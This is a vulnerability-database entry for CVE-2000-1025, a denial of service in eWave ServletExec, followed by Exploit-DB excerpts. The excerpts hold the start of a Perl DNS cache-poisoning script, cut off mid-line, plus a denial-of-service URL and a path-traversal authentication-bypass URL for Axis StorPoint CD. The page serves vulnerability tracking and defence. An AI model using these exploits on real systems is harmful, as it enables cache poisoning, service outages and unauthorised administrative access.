CVE-2000-1025
published 2000-12-11CVE-2000-1025: eWave ServletExec JSP/Java servlet engine, versions 3.0C and earlier, allows remote attackers to cause a denial of service via a URL that contains the…
PriorityP418medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
8.49%
94.3th percentile
eWave ServletExec JSP/Java servlet engine, versions 3.0C and earlier, allows remote attackers to cause a denial of service via a URL that contains the "/servlet/" string, which invokes the ServletExec servlet and causes an exception if the servlet is already running.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| unify | ewave_servletexec | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)
exploitdb·2007-11-13
CVE-2007-3898 Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)
---
source: https://www.securityfocus.com/bid/25919/info
Microsoft Windows DNS Server is prone to a vulnerability that permits an attacker to spoof responses to DNS requests.
A successful attack will corrupt the DNS cache with attacker-specified content. This may aid in further attacks such as phishing.
#!/usr/bin/perl
use strict;
use Net::DNS;
use Net::DNS::Nameserver;
use IO::Socket;
use Net::RawIP;
sub usage {
print ("$0 is a program for DNS id spoofing.\n");
print ("usage: $0 target tospoof ourzone port\n");
print ("Example: $0 ns1.belbone.be www.hotmail.com .cache-poisoning.net 1025\n");
}
my($target, $tospoof, $ourzone, $query_port) = @ARGV;
$tospoof = "www.hotmail.com" unless($tospoof);
$ourzone = ".cache-poiso
Exploit-DB
Unify eWave ServletExec 3.0 c - Denial of Service
exploitdb·2000-10-30
CVE-2000-1025 Unify eWave ServletExec 3.0 c - Denial of Service
Unify eWave ServletExec 3.0 c - Denial of Service
---
source: https://www.securityfocus.com/bid/1868/info
Unify eWave ServletExec is a Java/Java Servlet engine plug-in for major web servers such as Microsoft IIS, Apache, Netscape Enterprise Server, etc.
eWave ServletExec is susceptible to a denial of service attack if a URL invoking the ServletExec servlet preceded by /servlet is requested. The ServletExec engine will attempt to bind a server thread over port 80 and if the web server is currently running, a java.net.BindException error will result thus halting all operations on the ServletExec engine. The web server is not affected by this vulnerability. Restarting the application is required in order to regain normal functionality.
http://target/servlet/ServletExec
or
nc 10.0.0.1 8
Exploit-DB
Axis Communications StorPoint CD - Authentication Bypass
exploitdb·2000-03-01
CVE-2000-0191 Axis Communications StorPoint CD - Authentication Bypass
Axis Communications StorPoint CD - Authentication Bypass
---
source: https://www.securityfocus.com/bid/1025/info
Axis StorPoint CD and Axis StorPoint CD/T are CD ROM servers (actual hardware units)sold by Axis Communications. Both of these appliances support remote management
via SNMP MIB-II and private enterprise MIB as well as from the web via a system-supplied webserver. In regards to the web based administration, users can completely bypass authentication (username and password) by using a specified URL. The actual login page is located at:
http://server/config/html/cnf_gi.htm
However, by using:
http://server/cd/../config/html/cnf_gi.htm
A user side steps the login page and gains administrative access to the appliance.
http://server/cd/../config/html/cnf_gi.htm
No writeups or analysis indexed.
2000-12-11
Published